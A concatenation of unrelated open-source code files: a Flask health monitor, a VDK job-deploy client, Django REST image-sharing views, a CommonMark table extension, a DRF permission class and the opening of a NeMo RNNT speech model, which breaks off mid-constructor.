init = parse_init(file.readline())
file.readline() # skip empty line
rules = parse_rules(file.readlines())
return process(init, rules, 50000000000)
if __name__ == '__main__':
print("Sum of plants positions = ", compute("data.txt"))
|
the-stack_106_30597 | from flask import Flask, jsonify
from gevent.wsgi import WSGIServer
from collections import deque
import logging
import binascii
import decimal
class Logger(object):
""" A dummy file object to allow using a logger to log requests instead
of sending to stderr like the default WSGI logger """
logger = None
def write(self, s):
self.logger.info(s.strip())
class ReverseProxied(object):
'''Wrap the application in this middleware and configure the
front-end server to add these headers, to let you quietly bind
this to a URL other than / and to an HTTP scheme that is
different than what is used locally.
In nginx:
location /myprefix {
proxy_pass http://192.168.0.1:5001;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Scheme $scheme;
proxy_set_header X-Script-Name /myprefix;
}
:param app: the WSGI application
'''
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
script_name = environ.get('HTTP_X_SCRIPT_NAME', '')
if script_name:
environ['SCRIPT_NAME'] = script_name
path_info = environ['PATH_INFO']
if path_info.startswith(script_name):
environ['PATH_INFO'] = path_info[len(script_name):]
scheme = environ.get('HTTP_X_SCHEME', '')
if scheme:
environ['wsgi.url_scheme'] = scheme
return self.app(environ, start_response)
class ServerMonitor(WSGIServer):
""" Provides a few useful json endpoints for viewing server health and
performance. """
def __init__(self, manager):
self.logger = logging.getLogger(self.__class__.__name__)
self.manager = manager
self.settings = self.manager.settings
app = Flask(__name__)
app.wsgi_app = ReverseProxied(app.wsgi_app)
app.add_url_rule('/', 'general', self.general)
self.app = app
def start(self, *args, **kwargs):
WSGIServer.__init__(self, self.settings['ui_address'], self.app,
spawn=100, log=Logger())
self.logger.info("Monitoring port listening on {}"
.format(self.settings['ui_address']))
# Monkey patch the wsgi logger
Logger.logger = self.logger
WSGIServer.start(self, *args, **kwargs)
def stop(self, *args, **kwargs):
WSGIServer.stop(self)
self.logger.info("Exit")
def general(self):
conns = []
for conn in self.manager.peermgr.peers:
conns.append(dict(height=conn.remote_height,
protocol_version=conn.ver_send,
client_version=conn.client_version,
address="{}:{}".format(conn.dstaddr, conn.dstport)))
data = dict(height=self.manager.chaindb.getheight(),
hash=binascii.hexlify(self.manager.chaindb.gettophash()[::-1]),
peer_count=len(self.manager.peermgr.peers),
peers=conns)
return jsonify(jsonize(data))
def jsonize(item):
""" Recursive function that converts a lot of non-serializable content
to something json.dumps will like better """
if isinstance(item, dict):
new = {}
for k, v in item.iteritems():
k = str(k)
if isinstance(v, deque):
new[k] = jsonize(list(v))
else:
new[k] = jsonize(v)
return new
elif isinstance(item, list) or isinstance(item, tuple):
new = []
for part in item:
new.append(jsonize(part))
return new
else:
if isinstance(item, str):
return item.encode('string_escape')
elif isinstance(item, set):
return list(item)
elif isinstance(item, decimal.Decimal):
return float(item)
elif isinstance(item, (int, long, bool, float)) or item is None:
return item
elif hasattr(item, "__dict__"):
return {str(k).encode('string_escape'): str(v).encode('string_escape')
for k, v in item.__dict__.iteritems()}
else:
return str(item)
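# A minimal sketch (hypothetical data) showing what jsonize does to values
# that json.dumps cannot handle directly: deques become lists, Decimals
# become floats, sets become lists, and objects fall back to __dict__/str.
def _jsonize_demo():
    sample = dict(latencies=deque([1, 2, 3]), fee=decimal.Decimal("0.25"))
    return jsonize(sample)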
|
the-stack_106_30598 | def calculate(operation, first, second):
if operation == '+':
return first + second
elif operation == '-':
return first - second
elif operation == 'x':
return int(first) * second
elif operation == '/':
return first / second
else:
return 'Invalid operation'
def read_file(file_name):
with open(file_name, 'r') as f:
return f.read().splitlines()
def process():
lines = read_file('data.txt')
for line in lines:
calc, operation, first, second = line.split()
if calc == 'calc':
output = calculate(operation, int(first), int(second))
#print('{0} {1} {2} {3}'.format(calc, operation, first, second))
print(output)
def goto(line_number):
lines = read_file('data.txt')
line = lines[line_number-1]
calc, operation, first, second = line.split()
if calc == 'calc':
output = calculate(operation, int(first), int(second))
print(output)
def goto_calc(input):
print(input)
goto(2)
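# A minimal sketch of calling `calculate` directly; the data.txt lines read
# by `process` and `goto` are assumed to look like "calc + 4 13"
# (keyword, operator, first operand, second operand).
def demo_calculate():
    print(calculate('+', 4, 13))  # 17
    print(calculate('x', 4, 13))  # 52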
|
the-stack_106_30600 | # Copyright 2021 VMware, Inc.
# SPDX-License-Identifier: Apache-2.0
import glob
import json
import logging
import os
from typing import Optional
import click
import click_spinner
from tabulate import tabulate
from taurus_datajob_api import ApiException
from taurus_datajob_api import DataJob
from taurus_datajob_api import DataJobConfig
from taurus_datajob_api import DataJobContacts
from taurus_datajob_api import DataJobDeployment
from taurus_datajob_api import DataJobSchedule
from vdk.internal.control.configuration.defaults_config import load_default_team_name
from vdk.internal.control.exception.vdk_exception import VDKException
from vdk.internal.control.job.job_archive import JobArchive
from vdk.internal.control.job.job_config import JobConfig
from vdk.internal.control.rest_lib.factory import ApiClientFactory
from vdk.internal.control.rest_lib.rest_client_errors import ApiClientErrorDecorator
from vdk.internal.control.utils.cli_utils import get_or_prompt
from vdk.internal.control.utils.cli_utils import OutputFormat
log = logging.getLogger(__name__)
class JobDeploy:
ZIP_ARCHIVE_TYPE = "zip"
ARCHIVE_SUFFIX = "-archive"
def __init__(self, rest_api_url: str, output):
self.deploy_api = ApiClientFactory(rest_api_url).get_deploy_api()
self.jobs_api = ApiClientFactory(rest_api_url).get_jobs_api()
self.job_sources_api = ApiClientFactory(rest_api_url).get_jobs_sources_api()
# support for multiple deployments is not implemented yet so we can put anything here.
# Ultimately this will be user facing parameter (possibly fetched from config.ini)
self.__deployment_id = "production"
self.__job_archive = JobArchive()
@staticmethod
def __detect_keytab_files_in_job_directory(job_path: str) -> None:
keytab_glob = os.path.join(job_path, "**/*.keytab")
keytab_files = glob.glob(keytab_glob, recursive=True)
if keytab_files:
raise VDKException(
what=f"Detected keytab file inside data job directory.: {keytab_files}",
why="Keytab files are secret and must be kept separate - usually at the same level as data job directory but not inside.",
consequence="In order to prevent security issues, data job code will not be uploaded and deploy operation is aborted.",
countermeasure="Move the keytab file outside data job directory and try to deploy again.",
)
@staticmethod
def __validate_datajob(job_path: str, job_config: JobConfig, team: str) -> None:
log.debug(
"Validate data job does not have credentials in its directory (keytab file)"
)
JobDeploy.__detect_keytab_files_in_job_directory(job_path)
log.debug("Validate data job team is consistent.")
job_config_team = job_config.get_team()
if team is not None and job_config_team is not None and team != job_config_team:
raise VDKException(
what="Cannot create new deployment of the data job.",
why=f"Team param ({team}) and team value in config.ini ({job_config_team}) do not match.",
consequence="The latest change is not deployed, job will continue to run with previous version.",
countermeasure=f"1. Fix config.ini to set correct team (if it is {team}) OR\n"
f"2. Do not pass team param (team {job_config_team} will be automatically used from config.ini) OR\n"
f"3. Pass param team={job_config_team} OR\n"
f"4. Create a new job with team={team} and try to deploy it\n",
)
# TODO: we may use https://github.com/Yelp/detect-secrets to make sure users do not accidentally pass secrets
@staticmethod
def __check_value(key: str, value: str) -> str:
if not value:
raise VDKException(
what="Cannot extract job configuration.",
why=f"Configuration property {key} in file config.ini is missing.",
consequence="Cannot deploy the Data Job.",
countermeasure="Update config.ini.",
)
return value
def __read_data_job(self, name: str, team: str) -> DataJob:
try:
return self.jobs_api.data_job_read(team_name=team, job_name=name)
except ApiException as e:
raise VDKException(
what=f"Cannot find data job {name}",
why="Data job does not exist on CLOUD.",
consequence="Cannot deploy the Data Job.",
countermeasure="Use VDK CLI create command to create the job first.",
) from e
@staticmethod
def __archive_binary(job_archive_path: str) -> bytes:
log.debug(f"Read archive binary: {job_archive_path}")
with open(job_archive_path, "rb") as job_archive_file:
# Read the whole file at once
job_archive_binary = job_archive_file.read()
return job_archive_binary
@staticmethod
def __cleanup_archive(archive_path: str) -> None:
try:
log.debug(f"Remove temp archive {archive_path}")
os.remove(archive_path)
except OSError as e:
log.warning(
VDKException(
what=f"Cannot cleanup archive: {archive_path} as part of deployment.",
why=f"VDK CLI did not clean up after deploying: {e}",
consequence="There is a leftover archive file next to the folder containing the data job",
countermeasure="Clean up the archive file manually or leave it",
).message
)
def __update_data_job_deploy_configuration(
self, job_path: str, name: str, team: str
) -> None:
job: DataJob = self.__read_data_job(name, team)
local_config = JobConfig(job_path)
schedule = self.__check_value("schedule_cron", local_config.get_schedule_cron())
contacts = DataJobContacts(
local_config.get_contacts_notified_on_job_failure_user_error(),
local_config.get_contacts_notified_on_job_failure_platform_error(),
local_config.get_contacts_notified_on_job_success(),
local_config.get_contacts_notified_on_job_deploy(),
)
job.config = DataJobConfig(
enable_execution_notifications=local_config.get_enable_execution_notifications(),
notification_delay_period_minutes=local_config.get_notification_delay_period_minutes(),
contacts=contacts,
schedule=DataJobSchedule(schedule_cron=schedule),
)
log.debug(f"Update data job deploy configuration: {job}")
self.jobs_api.data_job_update(team_name=team, job_name=name, data_job=job)
@ApiClientErrorDecorator()
def update(
self,
name: str,
team: str,
enabled: Optional[bool], # true, false or None
job_version: Optional[str],
vdk_version: Optional[str],
output: str,
) -> None:
deployment = DataJobDeployment(enabled=None)
if job_version:
deployment.job_version = job_version
if vdk_version:
deployment.vdk_version = vdk_version
deployment.enabled = enabled
if job_version:
self.__update_job_version(name, team, deployment, output)
elif vdk_version or enabled is not None:
self.__update_deployment(name, team, deployment)
msg = f"Deployment of Data Job {name} updated; "
if vdk_version:
msg = msg + f"vdk version: {vdk_version}; "
if enabled is not None:
msg = msg + "status: " + ("enabled" if enabled else "disabled") + "; "
log.info(msg)
else:
log.warning(f"Nothing to update for deployment of job {name}.")
def __update_deployment(
self, name: str, team: str, deployment: DataJobDeployment
) -> None:
log.debug(f"Update Deployment of a job {name} of team {team} : {deployment}")
self.deploy_api.deployment_patch(
team_name=team,
job_name=name,
deployment_id=self.__deployment_id,
data_job_deployment=deployment,
)
def __update_job_version(
self, name: str, team: str, deployment: DataJobDeployment, output: str
):
log.debug(
f"Update Deployment version of a job {name} of team {team} : {deployment}"
)
self.deploy_api.deployment_update(
team_name=team, job_name=name, data_job_deployment=deployment
)
if output == OutputFormat.TEXT.value:
log.info(
f"Request to deploy Data Job {name} using version {deployment.job_version} finished successfully.\n"
f"It would take a few minutes for the Data Job to be deployed in the server.\n"
f"If notified_on_job_deploy option in config.ini is configured then "
f"notification will be sent on successful deploy or in case of an error.\n\n"
f"You can also execute `vdk deploy --show -t {team} -n {name}` and compare the printed version "
f"to the one of the newly deployed job - {deployment.job_version} - to verify that the deployment "
f"was successful."
)
else:
result = {
"job_name": name,
"job_version": deployment.job_version,
}
click.echo(json.dumps(result))
@ApiClientErrorDecorator()
def remove(self, name: str, team: str) -> None:
log.debug(f"Remove Deployment of a job {name} of team {team}")
self.deploy_api.deployment_delete(
team_name=team, job_name=name, deployment_id=self.__deployment_id
)
log.info(f"Deployment of Data Job {name} removed.")
@ApiClientErrorDecorator()
def show(self, name: str, team: str, output: str) -> None:
log.debug(f"Get list of deployments for job {name} of team {team} ")
deployments = self.deploy_api.deployment_list(team_name=team, job_name=name)
log.debug(
f"Found following deployments for job {name} of team {team} : {deployments}"
)
if deployments:
# d.to_dict() brings unnecessary parts of data
deployments = map(
lambda d: dict(
job_name=name,
job_version=d.job_version,
last_deployed_by=d.last_deployed_by,
last_deployed_date=d.last_deployed_date,
enabled=d.enabled,
),
deployments,
)
if output == OutputFormat.TEXT.value:
click.echo(
"You can compare the version seen here to the one seen when "
"deploying to verify your deployment was successful."
)
click.echo("")
click.echo(tabulate(deployments, headers="keys"))
else:
click.echo(json.dumps(list(deployments)))
else:
if output == OutputFormat.TEXT.value:
click.echo("No deployments.")
else:
click.echo(json.dumps([]))
@ApiClientErrorDecorator()
def create(
self,
name: str,
team: str,
job_path: str,
reason: str,
output: str,
vdk_version: Optional[str],
enabled: Optional[bool],
) -> None:
log.debug(
f"Create Deployment of a job {name} of team {team} with local path {job_path} and reason {reason}"
)
job_path = os.path.abspath(job_path)
if not os.path.isdir(job_path):
raise VDKException(
what="Cannot create new deployment of the data job.",
why=f"Directory {job_path} does not exists.",
consequence="The latest change is not deployed, job will continue to run with previous version",
countermeasure="Provide correct path to the Data Job.",
)
log.debug(
"We verify that config.ini exists. This is to avoid uploading accidentally some random directory"
)
job_config = JobConfig(job_path)
self.__validate_datajob(job_path=job_path, job_config=job_config, team=team)
team = get_or_prompt(
"Team Name", team or job_config.get_team() or load_default_team_name()
)
if output == OutputFormat.TEXT.value:
log.info(
f"Deploy Data Job with name {name} from directory {job_path} ... \n"
)
archive_path = self.__job_archive.archive_data_job(
job_name=name, job_archive_path=job_path
)
try:
job_archive_binary = self.__archive_binary(archive_path)
if output == OutputFormat.TEXT.value:
log.info("Uploading the data job might take some time ...")
with click_spinner.spinner(disable=(output == OutputFormat.JSON.value)):
data_job_version = self.job_sources_api.sources_upload(
team_name=team,
job_name=name,
body=job_archive_binary,
reason=reason,
)
self.__update_data_job_deploy_configuration(job_path, name, team)
self.update(
name, team, enabled, data_job_version.version_sha, vdk_version, output
)
finally:
self.__cleanup_archive(archive_path=archive_path)
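# A minimal usage sketch; the control-service URL, team and job names below
# are assumptions for illustration only.
def _example_deploy():
    deployer = JobDeploy("http://localhost:8092", output=OutputFormat.TEXT.value)
    deployer.create(
        name="example-job",
        team="example-team",
        job_path="./example-job",
        reason="initial deploy",
        output=OutputFormat.TEXT.value,
        vdk_version=None,
        enabled=None,
    )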
|
the-stack_106_30601 | from rest_framework.views import APIView
from rest_framework import status
from rest_framework.response import Response
from . import models, serializers
from jin2gram.users import models as user_models
from jin2gram.users import serializers as user_serializers
from jin2gram.notifications import views as notification_views
class Images(APIView):
def get(self, request, format=None):
user = request.user
following_users = user.following.all()
image_list = []
        # images from the people the user follows
        for following_user in following_users:
            # take only 2 images per user
            user_image = following_user.images.all()[:2]
for image in user_image:
image_list.append(image)
        # the user's own images
my_images = user.images.all()[:2]
for image in my_images:
image_list.append(image)
# sorted_list = sorted(image_list, key=get_key, reverse=True)
        # lambda expression
sorted_list = sorted(image_list, key=lambda image: image.created_at, reverse=True)
serializer = serializers.ImageSerializer(sorted_list, many=True, context={'request': request})
return Response(serializer.data)
def post(self, request, format=None):
user = request.user
serializer = serializers.InputImageSerializer(data=request.data)
if serializer.is_valid():
serializer.save(creator=user)
return Response(data=serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(data=serializer.data, status=status.HTTP_400_BAD_REQUEST)
# def get_key(image):
# return image.created_at
class LikeImage(APIView):
def get(self, request, image_id, format=None):
likes = models.Like.objects.filter(img__id=image_id)
like_creator_ids = likes.values('creator_id')
users = user_models.User.objects.filter(id__in=like_creator_ids)
serializer = user_serializers.ListUserSerializer(users, many=True, context={"request": request})
return Response(data=serializer.data, status=status.HTTP_200_OK)
def post(self, request, image_id, format=None):
user = request.user
try:
found_image = models.Image.objects.get(id=image_id)
except models.Image.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
try:
            preexisting_like = models.Like.objects.get(
creator=user,
img=found_image
)
return Response(status=status.HTTP_304_NOT_MODIFIED)
except models.Like.DoesNotExist:
new_like = models.Like.objects.create(
creator=user,
img=found_image
)
new_like.save()
notification_views.create_notification(user, found_image.creator, 'like', found_image)
return Response(status=status.HTTP_201_CREATED)
class UnLikeImage(APIView):
def delete(self, request, image_id, format=None):
user = request.user
try:
found_image = models.Image.objects.get(id=image_id)
except models.Image.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
try:
            preexisting_like = models.Like.objects.get(
                creator=user,
                img=found_image
            )
            preexisting_like.delete()
            return Response(status=status.HTTP_204_NO_CONTENT)
        except models.Like.DoesNotExist:
            # there is no like to remove, so nothing is modified
            return Response(status=status.HTTP_304_NOT_MODIFIED)
class CommentImage(APIView):
def post(self, request, image_id, format=None):
user = request.user
try:
found_image = models.Image.objects.get(id=image_id)
except models.Image.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
serializer = serializers.CommentSerializer(data=request.data)
if serializer.is_valid():
serializer.save(
creator=user,
img=found_image
)
# notification_views.create_notification(user, found_image.creator, 'comment', found_image, request.data['message'])
notification_views.create_notification(
user, found_image.creator, 'comment', found_image, serializer.data['message'])
return Response(data=serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class Comment(APIView):
def delete(self, request, comment_id, format=None):
user = request.user
try:
            comment = models.Comment.objects.get(id=comment_id, creator=user)
            comment.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
except models.Comment.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
class ModerateComment(APIView):
    # deleting a comment left on an image the user uploaded
def delete(self, request, image_id, comment_id, format=None):
user = request.user
try:
delete_comment = models.Comment.objects.get(id=comment_id, img__id=image_id, img__creator=user)
delete_comment.delete()
except models.Comment.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
return Response(status=status.HTTP_204_NO_CONTENT)
class Search(APIView):
def get(self, request, format=None):
hashtags = request.query_params.get('hashtags', None)
if hashtags is not None:
hashtags = hashtags.split(',')
images = models.Image.objects.filter(tags__name__in=hashtags).distinct()
serializer = serializers.UserProfileImageSerializer(images, many=True)
return Response(data=serializer.data, status=status.HTTP_200_OK)
else:
return Response(status=status.HTTP_400_BAD_REQUEST)
class DetailImage(APIView):
def found_own_image(self, image_id, user):
try:
image = models.Image.objects.get(id=image_id, creator=user)
return image
except models.Image.DoesNotExist:
return None
def get(self, request, image_id, format=None):
try:
image = models.Image.objects.get(id=image_id)
except models.Image.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
serializer = serializers.ImageSerializer(image, context={'request': request})
return Response(data=serializer.data, status=status.HTTP_200_OK)
    def put(self, request, image_id, format=None):
        user = request.user
        image = self.found_own_image(image_id, user)
        if image is None:
            return Response(status=status.HTTP_400_BAD_REQUEST)
        serializer = serializers.InputImageSerializer(image, data=request.data, partial=True)
if serializer.is_valid():
serializer.save(creator=user)
return Response(data=serializer.data, status=status.HTTP_200_OK)
else:
return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, image_id, format=None):
user = request.user
image = self.found_own_image(image_id, user)
if image is None:
return Response(status=status.HTTP_400_BAD_REQUEST)
image.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
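# A minimal URL-routing sketch for the views above; the path strings and the
# idea of placing them in this app's urls.py are assumptions, not part of the
# original code.
#
#   from django.urls import path
#   urlpatterns = [
#       path('images/', Images.as_view()),
#       path('images/<int:image_id>/likes/', LikeImage.as_view()),
#       path('images/<int:image_id>/unlikes/', UnLikeImage.as_view()),
#       path('images/<int:image_id>/comments/', CommentImage.as_view()),
#       path('comments/<int:comment_id>/', Comment.as_view()),
#       path('images/<int:image_id>/comments/<int:comment_id>/', ModerateComment.as_view()),
#       path('images/search/', Search.as_view()),
#       path('images/<int:image_id>/', DetailImage.as_view()),
#   ]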
|
the-stack_106_30602 | from djcelery_transactions import task
from celery.registry import tasks
from django.db import transaction
from django.test import TransactionTestCase
my_global = []
marker = object()
@task
def my_task():
my_global.append(marker)
tasks.register(my_task)
class SpecificException(Exception):
pass
class DjangoCeleryTestCase(TransactionTestCase):
"""Test djcelery transaction safe task manager
"""
def tearDown(self):
my_global[:] = []
def test_commited_transaction_fire_task(self):
"""Check that task is consumed when no exception happens
"""
@transaction.commit_on_success
def do_something():
my_task.delay()
do_something()
self.assertTrue(my_global[0] is marker)
def test_rollbacked_transaction_discard_task(self):
"""Check that task is not consumed when exception happens
"""
@transaction.commit_on_success
def do_something():
my_task.delay()
raise SpecificException
try:
do_something()
except SpecificException:
self.assertFalse(my_global)
else:
self.fail('Exception not raised')
|
the-stack_106_30605 | class Solution(object):
def majorityElement(self, nums): # majority element more than n/2
"""
:type nums: List[int]
:rtype: int
"""
count = 1
        major = nums[0]  # each non-major element cancels one majority element, but the majority element outnumbers all others combined
for i in range(1,len(nums)):
if count == 0:
major = nums[i]
count += 1
elif major == nums[i]:
count += 1
else:
count -= 1
return major
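# A minimal sketch of exercising the method above; the input list is an
# arbitrary example, not taken from the original problem statement.
if __name__ == "__main__":
    print(Solution().majorityElement([2, 2, 1, 1, 1, 2, 2]))  # prints 2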
|
the-stack_106_30606 | from collections import defaultdict
import commonmark
import commonmark.blocks
import commonmark.node
# Monkey-patch the reMaybeSpecial regex to add our table symbol |.
# This regex is apparently just an optimization so this should not
# affect CommonMark parser instances that do not recognize tables.
import re
commonmark.blocks.reMaybeSpecial = re.compile(r'^[#`~*+_=<>0-9-|]')
# Define a new BlockStarts class that implements a table method
# to detect and parse table starts, modeled after the blockquote.
class BlockStarts(commonmark.blocks.BlockStarts):
def __init__(self):
self.METHODS = ["table"] + self.METHODS
@staticmethod
def table(parser, container):
if not parser.indented and \
commonmark.blocks.peek(parser.current_line, parser.next_nonspace) == '|':
parser.advance_next_nonspace()
parser.advance_offset(1, False)
parser.close_unmatched_blocks()
parser.add_child('table', parser.next_nonspace)
return 1
return 0
# Define a new Table class that handles incoming table lines, modeled
# a bit after the Blockquote, which allows continuation lines so long as
# they start with the symbol. Also has accepts_lines to suck in everything
# within it as raw data. Accept : as a continuation symbol for
# Github-flavored Markdown table column alignment.
class Table(commonmark.blocks.Block):
accepts_lines = True
@staticmethod
def continue_(parser=None, container=None):
ln = parser.current_line
if not parser.indented and commonmark.blocks.peek(ln, parser.next_nonspace) == "|":
parser.advance_next_nonspace()
parser.advance_offset(1, False)
elif not parser.indented and commonmark.blocks.peek(ln, parser.next_nonspace) not in ("", ">", "`"):
pass
else:
return 1
return 0
@staticmethod
def finalize(parser=None, block=None):
# Split the table content into rows and columns,
# with each line a new row.
#
# Note that the | in the first column is not a
# part of string_content because it was removed
# when we slurped in the table.
table = [[""]]
escape = False
newrowbars = False
for c in block.string_content.rstrip():
# \-escaping
if escape:
table[-1][-1] += c
escape = False
elif c == "\\":
escape = True
# New cell is begun by a bar. Right-strip the cell we're
# ending.
elif c == "|":
table[-1][-1] = table[-1][-1].rstrip()
table[-1].append("")
# New row is begun by a newline.
# Since there's always a pipe at the end of a line,
# pop last cell if empty.
elif c == "\n":
if table[-1][-1].strip() == "": table[-1].pop(-1)
table.append([""])
# Ignore space at start of cell. An escaped space
# can force a space.
elif c in (" ", "\t") and table[-1][-1] == "":
pass
# Content.
else:
table[-1][-1] += c
# Remove the last cell if it's empty since it's caused
# by the final pipe at the end of the last line.
if table[-1][-1].strip() == "":
table[-1].pop(-1)
# Re-flow the table into a <thead> part and a <tbody> part,
# and if the separator row uses ='s instead of -'s then
# treat subsequent rows as multiline rows that must be
# separated by ='s.
column_properties = defaultdict(lambda : {})
table_parts = [[]] # [thead, tbody] or just [tbody]
multiline = False
newrow = False
for row in table:
if len(list(filter(lambda cell : not re.match(r"[-=:]+$", cell), row))) == 0:
                # This row has cells of just dashes.
if len(table_parts) == 1:
# The first time, we shift to the tbody.
table_parts.append([])
# We also pick out column properties from the
# placement of a colon.
for i, cell in enumerate(row):
if cell.startswith(":") and cell.endswith(":"):
column_properties[i]["align"] = "center"
elif cell.startswith(":"):
column_properties[i]["align"] = "left"
elif cell.endswith(":"):
column_properties[i]["align"] = "right"
# If ='s were used, then the table is parsed in
# multiline mode.
if "=" in "".join(row):
multiline = True
elif multiline:
# Subsequent times we just note that we're starting a new row
# in multiline mode.
newrow = True
elif not multiline or newrow or len(table_parts[-1]) == 0:
# Append a new row.
table_parts[-1].append(row)
newrow = False
# Fill in empty rows if fewer than the header.
if len(table_parts) > 1 and len(table_parts[0][0]) > len(table_parts[-1][-1]):
table_parts[-1][-1].extend( ["" for _ in range(len(table_parts[0][0]) - len(table_parts[-1][-1])) ] )
else:
# Multline mode. Merge this row with the previous one.
for i in range(len(row)):
if i < len(table_parts[-1][-1]):
table_parts[-1][-1][i] += "\n" + row[i]
else:
table_parts[-1][-1].append(row[i])
# Remove the last table part (probably tbody) if there is no content.
if table_parts[-1] == []:
table_parts.pop(-1)
# Parse the Markdown in each cell using a new parser
# instance for each cell.
if not multiline:
# Just parse the inlines in each cell using the parser's
# inline_parser function. Wrap each cell string content
# in a Node first.
def inner_parser(cell):
node = commonmark.node.Node("document", 0)
node.string_content = cell
parser.inline_parser.parse(node)
return node
else:
# Parse each cell using the full Markdown parser,
# by instantiating a new instance of the same
# parser class first, using the same options.
inner_parser = type(parser)(options=parser.options).parse
for part in table_parts:
for row in part:
for i, cell in enumerate(row):
row[i] = inner_parser(cell)
# Store the parsed table on the node.
block.column_properties = column_properties
block.table = table_parts
commonmark.blocks.Table = Table
# Create a new parser sub-class that adds the new block-start
# for tables.
class ParserWithTables(commonmark.Parser):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.block_starts = BlockStarts()
# Define a new renderer that extends the HtmlRenderer and
# adds table rendering.
class RendererWithTables(commonmark.HtmlRenderer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def make_table_node(self, node):
return "<table>"
def table(self, node, entering):
if entering:
self.lit(self.make_table_node(node) + "\n")
for i, part in enumerate(node.table):
if i == 0:
part_tag = "thead"
else:
part_tag = "tbody"
self.lit("<" + part_tag + ">\n")
for row in part:
self.lit("<tr>\n")
for colidx, cell in enumerate(row):
if part_tag == "thead":
col_tag = "th"
if self.options.get("table_th_scope"):
col_attrs = ' scope="col"'
else:
col_attrs = ''
else:
col_tag = "td"
col_attrs = ""
if colidx in node.column_properties and "align" in node.column_properties[colidx]:
col_attrs += ' align=\"' + node.column_properties[colidx]["align"] + "\""
self.lit("<" + col_tag + col_attrs + ">")
import copy
inner_renderer = copy.copy(self)
cell = inner_renderer.render(cell)
# If the cell is just one <p>, unwrap it.
m = re.match("<p>(.*)</p>$", cell)
if m:
cell = m.group(1)
self.lit(cell)
self.lit("</" + col_tag + ">\n")
self.lit("</tr>\n")
self.lit("</" + part_tag + ">\n")
self.lit("</table>\n")
# Define a new helper method that would be an in-place replacement
# for commonmark.commonmark.
def commonmark_to_html(markup):
parser = ParserWithTables()
ast = parser.parse(markup)
return RendererWithTables().render(ast)
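# A minimal sketch (hypothetical input) of the pipe-table syntax the extension
# above recognizes: every row starts with '|', and a row of dashes separates
# the header from the body.
def _table_demo():
    sample = (
        "| Head A | Head B |\n"
        "|--------|--------|\n"
        "| a1     | b1     |\n"
    )
    return commonmark_to_html(sample)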
if __name__ == "__main__":
# Run the parser on STDIN and write to STDOUT.
import sys
parser = ParserWithTables()
ast = parser.parse(sys.stdin.read())
print(RendererWithTables().render(ast))
|
the-stack_106_30608 | from rest_framework import permissions
class IsOwnerOrReadOnly(permissions.BasePermission):
"""
Object-level permission to only allow owners of an object to edit it.
Assumes the model instance has an `owner` attribute.
"""
def has_object_permission(self, request, view, obj):
# Read permissions are allowed to any request,
# so we'll always allow GET, HEAD or OPTIONS requests.
if request.method in permissions.SAFE_METHODS:
return True
if request.user.is_superuser or request.user.has_perm(
"reservations.delete_permission"
):
return True
# Instance must have an attribute named `owner`.
return obj.user == request.user
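# A minimal sketch of wiring the permission into a DRF view; the Reservation
# model and serializer names are assumptions used only for illustration.
#
#   from rest_framework import generics
#
#   class ReservationDetail(generics.RetrieveUpdateDestroyAPIView):
#       queryset = Reservation.objects.all()
#       serializer_class = ReservationSerializer
#       permission_classes = [permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]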
|
the-stack_106_30610 | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import json
import os
import tempfile
from math import ceil
from typing import Dict, List, Optional, Union
import torch
from omegaconf import DictConfig, OmegaConf, open_dict
from pytorch_lightning import Trainer
from torch.utils.data import ChainDataset
from tqdm.auto import tqdm
from nemo.collections.asr.data import audio_to_text_dataset
from nemo.collections.asr.data.audio_to_text_dali import DALIOutputs
from nemo.collections.asr.losses.rnnt import RNNTLoss, resolve_rnnt_default_loss_name
from nemo.collections.asr.metrics.rnnt_wer import RNNTWER, RNNTDecoding
from nemo.collections.asr.models.asr_model import ASRModel, ExportableEncDecJointModel
from nemo.collections.asr.parts.mixins import ASRModuleMixin
from nemo.collections.asr.parts.preprocessing.perturb import process_augmentations
from nemo.core.classes.common import PretrainedModelInfo, typecheck
from nemo.core.neural_types import AcousticEncodedRepresentation, AudioSignal, LengthsType, NeuralType, SpectrogramType
from nemo.utils import logging
class EncDecRNNTModel(ASRModel, ASRModuleMixin, ExportableEncDecJointModel):
"""Base class for encoder decoder RNNT-based models."""
@classmethod
def list_available_models(cls) -> Optional[PretrainedModelInfo]:
"""
        This method returns a list of pre-trained models which can be instantiated directly from NVIDIA's NGC cloud.
Returns:
List of available pre-trained models.
"""
result = []
return result
def __init__(self, cfg: DictConfig, trainer: Trainer = None):
# Get global rank and total number of GPU workers for IterableDataset partitioning, if applicable
# Global_rank and local_rank is set by LightningModule in Lightning 1.2.0
self.world_size = 1
if trainer is not None:
self.world_size = trainer.num_nodes * trainer.num_gpus
super().__init__(cfg=cfg, trainer=trainer)
# Initialize components
self.preprocessor = EncDecRNNTModel.from_config_dict(self.cfg.preprocessor)
self.encoder = EncDecRNNTModel.from_config_dict(self.cfg.encoder)
# Update config values required by components dynamically
with open_dict(self.cfg.decoder):
self.cfg.decoder.vocab_size = len(self.cfg.labels)
with open_dict(self.cfg.joint):
self.cfg.joint.num_classes = len(self.cfg.labels)
self.cfg.joint.vocabulary = self.cfg.labels
self.cfg.joint.jointnet.encoder_hidden = self.cfg.model_defaults.enc_hidden
